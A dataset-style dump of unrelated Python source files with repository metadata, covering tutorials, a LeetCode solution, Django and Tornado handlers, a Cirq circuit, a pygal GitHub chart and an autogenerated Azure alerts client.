app = App(root)
mainloop()
| [
"[email protected]"
] | |
ebd10a0a4af3d11227b8cc8c42118b2079ceeef1 | 31f56a696a0a5ada4aa2d583f8b340201696b3c7 | /nabu/neuralnetworks/classifiers/__init__.py | 42fc49fb14a326860f2012974c7b5b9d567b6e93 | [
"MIT"
] | permissive | DavidKarlas/nabu | 6d7fcdcd46f97b8886382079d04251b6862203db | fb530cf617ff86fe8a249d4582dfe90a303da295 | refs/heads/master | 2020-12-30T13:29:38.735236 | 2017-04-28T14:50:57 | 2017-04-28T14:50:57 | 91,229,041 | 1 | 0 | null | 2017-05-14T08:09:03 | 2017-05-14T08:09:03 | null | UTF-8 | Python | false | false | 172 | py | '''@package classifiers
Contains the neural net classifiers (e.g. dnn) and their components
(e.g. layers)
'''
from . import activation, classifier, layer, asr, lm
| [
"[email protected]"
] | |
73e5dbdc975e9d650c27382bce182c16f1722617 | a8f275638f6bab07644b6b6d2ff4a1eabc4a3b4b | /class-Animal.py | aba9a9201900ff4e823d33444234c6b42432f825 | [] | no_license | evamaina/OOP | 1bfd49706365f3d297f2383ffd995b2159ade283 | b1623cf76896c21a4ac49526070d8f4ebd3b90a8 | refs/heads/master | 2021-08-17T20:44:47.516263 | 2017-11-21T17:22:12 | 2017-11-21T17:22:12 | 107,859,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | """Inheritance provides a way to share functionality between classes.
This similarity can be expressed by making them all inherit from a superclass Animal,
which contains the shared functionality"""
class Animal:
def __init__(self, name, color):
self.name = name
self.color = color
class Cat(Animal):
def purr(self):
print("Purr...")
class Dog(Animal):
def bark(self):
print("Woof!")
fido = Dog("Fido", "brown")
print(fido.color)
fido.bark() | [
"[email protected]"
] | |
f10d7333e8172120f845c6ba2d0052fc407fff29 | 2aa9432798d681a9a21535397bf3414d04bf014e | /test/loggingDemo.py | ec95bf2285c991a9c4e84eaa52b2932ef7680438 | [] | no_license | RaunakJalan/Selenium_Automation | babd426e9a12b3cfffe28a34af6486fcce57ce23 | 47d4faa275590b8f9c2d6922689275c13d3650c2 | refs/heads/master | 2023-03-14T14:42:40.308146 | 2021-03-09T16:29:16 | 2021-03-09T16:29:16 | 346,070,967 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | import logging
logging.basicConfig(filename="test.log",
format='%(asctime)s: %(levelname)s: %(message)s',
datefmt="%m/%d/%Y %I:%M:%S %p"
)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
logger.debug("This is a debug message")
logger.info("This is an info message")
logger.warning("This is a warning message")
logger.error("This is an error message")
logger.critical("This is a critical message")
| [
"[email protected]"
] | |
9eee040f0ac6b5d1d6039900ac3d403d046bf926 | cf7b827958166c8569eb58deb511cc3f07567741 | /in_Python_v2/1074 Number of Submatrices That Sum to Target.py | e3b4d58aa31bd7bded1a018b1d37e2c0dae32354 | [] | no_license | YangLiyli131/Leetcode2020 | e4e36eb36b1983f73b0e733455b4a7953dfebe6d | 20623defecf65cbc35b194d8b60d8b211816ee4f | refs/heads/master | 2023-08-22T06:00:55.924112 | 2021-09-18T19:04:15 | 2021-09-18T19:04:15 | 251,426,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 857 | py | from collections import defaultdict
class Solution(object):
def numSubmatrixSumTarget(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: int
"""
row, col = len(matrix), len(matrix[0])
ps = [[0] * (col + 1) for _ in range(row + 1)]
for i in range(1, row + 1):
for j in range(1, col + 1):
ps[i][j] = ps[i-1][j] + ps[i][j-1] - ps[i-1][j-1] + matrix[i-1][j-1]
res = 0
for r1 in range(1, row+1):
for r2 in range(r1, row+1):
h = defaultdict(int)
h[0] = 1
for c in range(1, col+1):
curs = ps[r2][c] - ps[r1-1][c]
res += h[curs - target]
h[curs] += 1
return res
| [
"[email protected]"
] | |
7601d4d19e420178a28cc601c74ab7d5147f8d3c | a6a2997ecc7dd8406f4e190d357cba1d301489c3 | /users/admin.py | 531bc47e3dd64703dae1fc4ae821ee05804a0ffb | [] | no_license | Shatki/itreactor | de306bd0a06d9b498645eeb76e191cfa70cdca04 | a657ad7fb4a9051f9ab845539a7369fe0da17d26 | refs/heads/master | 2023-02-21T15:29:00.840747 | 2021-01-28T05:37:15 | 2021-01-28T05:37:15 | 317,347,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,236 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.models import Group
from .forms import UserCreationForm, UserChangeForm
from .models import User, Feedback
@admin.register(User)
class UserAdmin(BaseUserAdmin):
model = User
# The forms to add and change user instances
form = UserChangeForm
add_form = UserCreationForm
list_display = (
'email',
'first_name',
'last_name',
'last_login')
list_filter = (
'date_joined',
'last_login',
)
readonly_fields = (
'date_joined',
'date_updated',
'last_login',
)
fieldsets = (
(None, {
'fields': (
'email',
'password',
)
}),
(u'Персональная информация', {
'fields': (
'first_name',
'last_name',
'photo',
)
}),
(u'Права доступа', {
'fields': (
'groups',
'user_permissions',
'is_superuser',
'is_staff',
'is_active',
)
}),
(u'Важные даты', {
'fields': (
'last_login',
'date_joined',
'date_updated',
)
}),
)
add_fieldsets = (
(None, {
'classes':
('wide',),
'fields': (
'email',
'password1',
'password2',
'is_superuser',
)
}),
)
search_fields = (
'email',)
ordering = (
'date_joined',)
filter_horizontal = (
'groups',
'user_permissions',
)
# Register your models here.
@admin.register(Feedback)
class FeedbackAdmin(admin.ModelAdmin):
list_display = ('name',
'date',
'email',
'subject',
'message',
)
search_fields = ('name',)
ordering = ('date',)
| [
"[email protected]"
] | |
a3de30095b503bfe0aca308080e3d8f013346b36 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p2DJ/New/program/cirq/startCirq407.py | 4cd57412338a48432208219d046554ef403b1008 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,268 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=2
# total number=20
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.Y.on(input_qubit[1])) # number=2
c.append(cirq.Y.on(input_qubit[1])) # number=4
c.append(cirq.Y.on(input_qubit[1])) # number=3
c.append(cirq.rx(2.0860175219836226).on(input_qubit[1])) # number=7
c.append(cirq.X.on(input_qubit[0])) # number=5
c.append(cirq.X.on(input_qubit[0])) # number=6
c.append(cirq.H.on(input_qubit[0])) # number=10
c.append(cirq.CZ.on(input_qubit[1],input_qubit[0])) # number=11
c.append(cirq.H.on(input_qubit[0])) # number=12
c.append(cirq.H.on(input_qubit[0])) # number=13
c.append(cirq.CZ.on(input_qubit[1],input_qubit[0])) # number=14
c.append(cirq.H.on(input_qubit[0])) # number=15
c.append(cirq.Y.on(input_qubit[0])) # number=16
c.append(cirq.Y.on(input_qubit[0])) # number=17
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=18
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=19
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq407.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | [
"[email protected]"
] | |
ddca45160dbe21af63be36d6a989d3787788a108 | 29145db13229d311269f317bf2819af6cba7d356 | /january circuits/equalSub.py | 379cf14defb37168832a4605de814de52080f970 | [] | no_license | rocket3989/hackerEarth2019 | 802d1ca6fd03e80657cbe07a3f123e087679af4d | 42c0a7005e52c3762496220136cc5c1ee93571bb | refs/heads/master | 2021-07-05T01:32:42.203964 | 2020-12-22T03:40:20 | 2020-12-22T03:40:20 | 211,607,143 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | N = int(input())
K = int(input())
A = [int(x) for x in input().split()]
maxOf = A[0]
l, r = 0, 1
sumEl = A[0]
maxLen = 1
while r < N + 1:
if sumEl + K < maxOf * (r - l):
sumEl -= A[l]
if A[l] == maxOf:
maxOf = max(A[l + 1:r])
l += 1
continue
maxLen = max(maxLen, r - l)
if r == N: break
maxOf = max(maxOf, A[r])
sumEl += A[r]
r += 1
print(maxLen) | [
"[email protected]"
] | |
198932798010531a6e5ee431ea85d0f3e5ca76b1 | c9642233f1de71f1a61ae28c695c2d9228825156 | /echecs_hall/app/views/mj_hall_api/good.py | 9ff47539c15f03ae8f000dca757f3e9985f69aac | [
"AFL-3.0"
] | permissive | obespoir/echecs | d8314cffa85c8dce316d40e3e713615e9b237648 | e4bb8be1d360b6c568725aee4dfe4c037a855a49 | refs/heads/master | 2022-12-11T04:04:40.021535 | 2020-03-29T06:58:25 | 2020-03-29T06:58:25 | 249,185,889 | 16 | 9 | null | null | null | null | UTF-8 | Python | false | false | 2,325 | py | # coding=utf-8
from app.views.base_handler import BaseHandler
from app.controller.mj_hall_controller import good_controller
from app.controller.mj_hall_controller import login_hall_controller
import json
from . import mj_hall
from app.share.error_code import *
import time
from app.extensions.common import md5
from tornado.web import authenticated
@mj_hall.route('/setgood')
class SetGood(BaseHandler):
def get(self):
print('good')
def post(self):
pass
@mj_hall.route('/getgood')
class GetGood(BaseHandler):
isLogin = True
tag = __name__
@authenticated
def get(self):
data = []
goods_list = good_controller.get_all_good_info()
if not good_controller.get_all_good_info():
self.return_data(NOT_GOODS, data)
for good in goods_list:
data.append({'id': good['id'], 'title': good['name'], 'rmb_price': good['rmb_price'],
'icon': good['icon'],
'selling_price': good['selling_price']})
self.return_success(data)
def post(self):
pass
@mj_hall.route('/buygood')
class BuyGood(BaseHandler):
isLogin = True
tag = __name__
@authenticated
def get(self):
param = json.loads(self.get_argument('base'))
sub_param = param['param']
good_id = int(self.get_param('id', sub_param))
# 获取玩家信息
user = self.current_user
uid = int(user['uid'])
user_money = int(user['money'])
user_diamond = int(user['diamond'])
# 根据id获取商品信息
good_info = good_controller.get_good_info_by_id(good_id)
# 商品价格
selling_price = int(good_info['selling_price'])
# 商品数量
quantity = int(good_info['quantity'])
if not good_info:
self.return_error(PARAM_ERROR)
# 判断玩家钻石是否够买此商品
if user_diamond >= selling_price:
diamond = user_diamond - selling_price
money = user_money + quantity
data = {'diamond': diamond, 'money': money}
login_hall_controller.update_user_in_cache(uid, data)
self.return_success(data)
else:
self.return_error(NOT_ENOUGH_DIAMOND)
def post(self):
pass
| [
"[email protected]"
] | |
a40038fb0b6957d262599096d21a59dd2890bc91 | e526543920e4974504cb62802c393d5bc46559db | /python-repos/python_repos.py | cddc2b416e8f6a10ff5f96a8cd45f8641eb00818 | [] | no_license | mare-astrorum/python-crash-course-practice | b843f2067208b749558c4423556498e643c5fa42 | 47423808902b75af9d7888d4f9fa9f083bce88f4 | refs/heads/master | 2020-09-06T19:02:09.837740 | 2019-11-08T17:30:52 | 2019-11-08T17:30:52 | 220,516,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,580 | py | import requests
import sys
import pygal
from pygal.style import LightColorizedStyle as LCS, LightenStyle as LS
# Make an API call and store the response.
url = 'https://api.github.com/search/repositories?q=language:python&sort=stars'
r = requests.get(url)
print("Status code:", r.status_code)
# Store API response in a variable.
response_dict = r.json()
print("Total repositories:", response_dict['total_count'])
# Explore information about the repositories.
repo_dicts = response_dict['items']
print("Repositories returned:", len(repo_dicts))
names, plot_dicts = [], []
for repo_dict in repo_dicts:
names.append(repo_dict['name'])
non_bmp_map = dict.fromkeys(range(0x10000, sys.maxunicode + 1), 0xfffd)
description = repo_dict['description']
if description == None:
good_description = 'No description.'
else:
good_description = description.translate(non_bmp_map)
plot_dict = {
'value': repo_dict['stargazers_count'],
'label': good_description,
'xlink': repo_dict['html_url']
}
plot_dicts.append(plot_dict)
# Make visualization.
my_style = LS('#333366', base_style=LCS)
my_config = pygal.Config()
my_config.x_label_rotation = 45
my_config.show_legend = False
my_config.title_font_size = 24
my_config.label_font_size = 14
my_config.major_label_font_size = 18
my_config.show_y_guides = False
my_config.width = 1000
chart = pygal.Bar(my_config, style=my_style)
chart.title = 'Python Projects'
chart.x_labels = names
chart.add('', plot_dicts)
chart.render_to_file('example_outcome_python_repos.svg')
| [
"[email protected]"
] | |
e017100cb679bf6f1ae3e8f315b984bb2e457cfb | 6375b7e4dfe11ced7dcd3fad1a7a2de9a504910d | /excel/xlutils_demo.py | d4506129814db5dc73782bc3726332f7f72f039b | [] | no_license | yaowenqiang/lpthw | b65e6b8ce576e7caa5cfba5570550e546d1e0549 | 4bbd7ebb4e8c570a39bf9c55df9bd97e4f86e1e5 | refs/heads/master | 2020-04-01T10:57:32.959389 | 2019-05-01T09:27:25 | 2019-05-01T09:27:25 | 153,140,026 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | import xlwt
import xlrd
import xlutils
# 打开excel文件
workbook = xlrd.open_workbook("myexclee.xls")
worksheet = workbook.sheet_by_index(0)
data = worksheet.cell_value(0,0)
wb = xlwt.Workbook()
# 新建excel
wb = xlwt.Workbook()
sh = wb.add_sheet('Sheet1')
sh.write(0,0,'data')
wb.save('myexcel.xls')
| [
"[email protected]"
] | |
0050e58aa4d71e43e495f50afeae7d51b46087dc | b457be31ac024f2a80ad553068544779d0680f48 | /dnawf/templates/clean_template.py | 5f1b01683a55986af6a84efe60413edbf363fd6e | [] | no_license | daxm/dnac-api-demo | 9ef0782b9d780aad7ece1112814dbe3a794d687c | dbf8432c84d9e47255b184310df69af48d1f1fee | refs/heads/master | 2022-11-03T14:42:26.021264 | 2020-06-16T20:00:32 | 2020-06-16T20:00:32 | 271,582,024 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,340 | py | #!/usr/bin/env python
# -*- coding: utf-
import json
from argparse import ArgumentParser
import glob
import os
import pprint
def clean_template(template):
pprint.pprint(t)
# template.pop('id')
template.pop('createTime')
template.pop('lastUpdateTime')
template.pop('parentTemplateId')
template.pop("projectId")
template.pop("projectName")
# need to clean vars.
for var in template['templateParams']:
var.pop('id')
return template
def remove_dict_key(key, var):
if hasattr(var, 'iteritems'):
if key in var.keys():
var.pop(key)
for k, v in var.iteritems():
if isinstance(v, dict):
for result in remove_dict_key(key, v):
yield result
elif isinstance(v, list):
for d in v:
for result in remove_dict_key(key, d):
yield result
def saveTemplate(template, orig_filename):
dir_name = os.path.dirname(orig_filename)
filename_extension = os.path.basename(orig_filename)
(basename, extension) = os.path.splitext(filename_extension)
out_f = open(dir_name + "/" + basename + "_clean" + extension, "a")
out_f.write(json.dumps(template, indent=4, sort_keys=True))
out_f.close()
def printTemplateContent(template):
print(100 * "#")
pprint.pprint(template)
print(100 * "#")
def removePreviousVersion(dir_name):
file_list = glob.glob(dir_name + "/*clean*")
# Iterate over the list of filepaths & remove each file.
for filePath in file_list:
try:
print("Deleting file : ", filePath)
os.remove(filePath)
except:
print("Error while deleting file : ", filePath)
if __name__ == "__main__":
parser = ArgumentParser(description='Select options.')
parser.add_argument('dir', help="directory where input json files are ")
args = parser.parse_args()
removePreviousVersion(args.dir)
for file_name in glob.glob(args.dir + "/*.json"):
print(file_name)
with open(file_name) as f:
template = json.load(f)
c_template = clean_template(template)
printTemplateContent(c_template)
saveTemplate(c_template, file_name)
| [
"[email protected]"
] | |
408abd329ed3059c69067f2e8937a82c4abe1a53 | 50948d4cb10dcb1cc9bc0355918478fb2841322a | /azure-mgmt-alertsmanagement/azure/mgmt/alertsmanagement/operations/alerts_operations.py | fd15f46bc8175cab9e2229c9c9919072c07c3b6a | [
"MIT"
] | permissive | xiafu-msft/azure-sdk-for-python | de9cd680b39962702b629a8e94726bb4ab261594 | 4d9560cfd519ee60667f3cc2f5295a58c18625db | refs/heads/master | 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 | MIT | 2020-10-02T01:17:02 | 2019-05-22T07:33:46 | Python | UTF-8 | Python | false | false | 27,563 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from .. import models
class AlertsOperations(object):
"""AlertsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: API version. Constant value: "2018-05-05".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2018-05-05"
self.config = config
def get_all(
self, target_resource=None, target_resource_type=None, target_resource_group=None, monitor_service=None, monitor_condition=None, severity=None, alert_state=None, alert_rule=None, smart_group_id=None, include_context=None, include_egress_config=None, page_count=None, sort_by=None, sort_order=None, select=None, time_range=None, custom_time_range=None, custom_headers=None, raw=False, **operation_config):
"""List all the existing alerts, where the results can be selective by
passing multiple filter parameters including time range and sorted on
specific fields. .
:param target_resource: Filter by target resource( which is full ARM
ID) Default value is select all.
:type target_resource: str
:param target_resource_type: Filter by target resource type. Default
value is select all.
:type target_resource_type: str
:param target_resource_group: Filter by target resource group name.
Default value is select all.
:type target_resource_group: str
:param monitor_service: Filter by monitor service which is the source
of the alert instance. Default value is select all. Possible values
include: 'Application Insights', 'ActivityLog Administrative',
'ActivityLog Security', 'ActivityLog Recommendation', 'ActivityLog
Policy', 'ActivityLog Autoscale', 'Log Analytics', 'Nagios',
'Platform', 'SCOM', 'ServiceHealth', 'SmartDetector', 'VM Insights',
'Zabbix'
:type monitor_service: str or
~azure.mgmt.alertsmanagement.models.MonitorService
:param monitor_condition: Filter by monitor condition which is the
state of the monitor(alertRule) at monitor service. Default value is
to select all. Possible values include: 'Fired', 'Resolved'
:type monitor_condition: str or
~azure.mgmt.alertsmanagement.models.MonitorCondition
:param severity: Filter by severity. Defaut value is select all.
Possible values include: 'Sev0', 'Sev1', 'Sev2', 'Sev3', 'Sev4'
:type severity: str or ~azure.mgmt.alertsmanagement.models.Severity
:param alert_state: Filter by state of the alert instance. Default
value is to select all. Possible values include: 'New',
'Acknowledged', 'Closed'
:type alert_state: str or
~azure.mgmt.alertsmanagement.models.AlertState
:param alert_rule: Filter by alert rule(monitor) which fired alert
instance. Default value is to select all.
:type alert_rule: str
:param smart_group_id: Filter the alerts list by the Smart Group Id.
Default value is none.
:type smart_group_id: str
:param include_context: Include context which has data contextual to
the monitor service. Default value is false'
:type include_context: bool
:param include_egress_config: Include egress config which would be
used for displaying the content in portal. Default value is 'false'.
:type include_egress_config: bool
:param page_count: Determines number of alerts returned per page in
response. Permissible value is between 1 to 250. When the
"includeContent" filter is selected, maximum value allowed is 25.
Default value is 25.
:type page_count: int
:param sort_by: Sort the query results by input field, Default value
is 'lastModifiedDateTime'. Possible values include: 'name',
'severity', 'alertState', 'monitorCondition', 'targetResource',
'targetResourceName', 'targetResourceGroup', 'targetResourceType',
'startDateTime', 'lastModifiedDateTime'
:type sort_by: str or
~azure.mgmt.alertsmanagement.models.AlertsSortByFields
:param sort_order: Sort the query results order in either ascending or
descending. Default value is 'desc' for time fields and 'asc' for
others. Possible values include: 'asc', 'desc'
:type sort_order: str
:param select: This filter allows to selection of the fields(comma
seperated) which would be part of the the essential section. This
would allow to project only the required fields rather than getting
entire content. Default is to fetch all the fields in the essentials
section.
:type select: str
:param time_range: Filter by time range by below listed values.
Default value is 1 day. Possible values include: '1h', '1d', '7d',
'30d'
:type time_range: str or ~azure.mgmt.alertsmanagement.models.TimeRange
:param custom_time_range: Filter by custom time range in the format
<start-time>/<end-time> where time is in (ISO-8601 format)'.
Permissible values is within 30 days from query time. Either
timeRange or customTimeRange could be used but not both. Default is
none.
:type custom_time_range: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Alert
:rtype:
~azure.mgmt.alertsmanagement.models.AlertPaged[~azure.mgmt.alertsmanagement.models.Alert]
:raises:
:class:`ErrorResponseException<azure.mgmt.alertsmanagement.models.ErrorResponseException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.get_all.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if target_resource is not None:
query_parameters['targetResource'] = self._serialize.query("target_resource", target_resource, 'str')
if target_resource_type is not None:
query_parameters['targetResourceType'] = self._serialize.query("target_resource_type", target_resource_type, 'str')
if target_resource_group is not None:
query_parameters['targetResourceGroup'] = self._serialize.query("target_resource_group", target_resource_group, 'str')
if monitor_service is not None:
query_parameters['monitorService'] = self._serialize.query("monitor_service", monitor_service, 'str')
if monitor_condition is not None:
query_parameters['monitorCondition'] = self._serialize.query("monitor_condition", monitor_condition, 'str')
if severity is not None:
query_parameters['severity'] = self._serialize.query("severity", severity, 'str')
if alert_state is not None:
query_parameters['alertState'] = self._serialize.query("alert_state", alert_state, 'str')
if alert_rule is not None:
query_parameters['alertRule'] = self._serialize.query("alert_rule", alert_rule, 'str')
if smart_group_id is not None:
query_parameters['smartGroupId'] = self._serialize.query("smart_group_id", smart_group_id, 'str')
if include_context is not None:
query_parameters['includeContext'] = self._serialize.query("include_context", include_context, 'bool')
if include_egress_config is not None:
query_parameters['includeEgressConfig'] = self._serialize.query("include_egress_config", include_egress_config, 'bool')
if page_count is not None:
query_parameters['pageCount'] = self._serialize.query("page_count", page_count, 'int')
if sort_by is not None:
query_parameters['sortBy'] = self._serialize.query("sort_by", sort_by, 'str')
if sort_order is not None:
query_parameters['sortOrder'] = self._serialize.query("sort_order", sort_order, 'str')
if select is not None:
query_parameters['select'] = self._serialize.query("select", select, 'str')
if time_range is not None:
query_parameters['timeRange'] = self._serialize.query("time_range", time_range, 'str')
if custom_time_range is not None:
query_parameters['customTimeRange'] = self._serialize.query("custom_time_range", custom_time_range, 'str')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
return response
# Deserialize response
deserialized = models.AlertPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.AlertPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
get_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AlertsManagement/alerts'}
def get_by_id(
self, alert_id, custom_headers=None, raw=False, **operation_config):
"""Get a specific alert.
Get information related to a specific alert.
:param alert_id: Unique ID of an alert instance.
:type alert_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Alert or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.alertsmanagement.models.Alert or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.alertsmanagement.models.ErrorResponseException>`
"""
# Construct URL
url = self.get_by_id.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'alertId': self._serialize.url("alert_id", alert_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Alert', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_by_id.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AlertsManagement/alerts/{alertId}'}
def change_state(
self, alert_id, new_state, custom_headers=None, raw=False, **operation_config):
"""Change the state of the alert.
:param alert_id: Unique ID of an alert instance.
:type alert_id: str
:param new_state: New state of the alert. Possible values include:
'New', 'Acknowledged', 'Closed'
:type new_state: str or ~azure.mgmt.alertsmanagement.models.AlertState
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Alert or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.alertsmanagement.models.Alert or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.alertsmanagement.models.ErrorResponseException>`
"""
# Construct URL
url = self.change_state.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'alertId': self._serialize.url("alert_id", alert_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
query_parameters['newState'] = self._serialize.query("new_state", new_state, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Alert', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
change_state.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AlertsManagement/alerts/{alertId}/changestate'}
def get_history(
self, alert_id, custom_headers=None, raw=False, **operation_config):
"""Get the history of the changes of an alert.
:param alert_id: Unique ID of an alert instance.
:type alert_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: AlertModification or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.alertsmanagement.models.AlertModification or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.alertsmanagement.models.ErrorResponseException>`
"""
# Construct URL
url = self.get_history.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'alertId': self._serialize.url("alert_id", alert_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AlertModification', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_history.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.AlertsManagement/alerts/{alertId}/history'}
def get_summary(
self, groupby, include_smart_groups_count=None, target_resource=None, target_resource_type=None, target_resource_group=None, monitor_service=None, monitor_condition=None, severity=None, alert_state=None, alert_rule=None, time_range=None, custom_time_range=None, custom_headers=None, raw=False, **operation_config):
"""Summary of alerts with the count each severity.
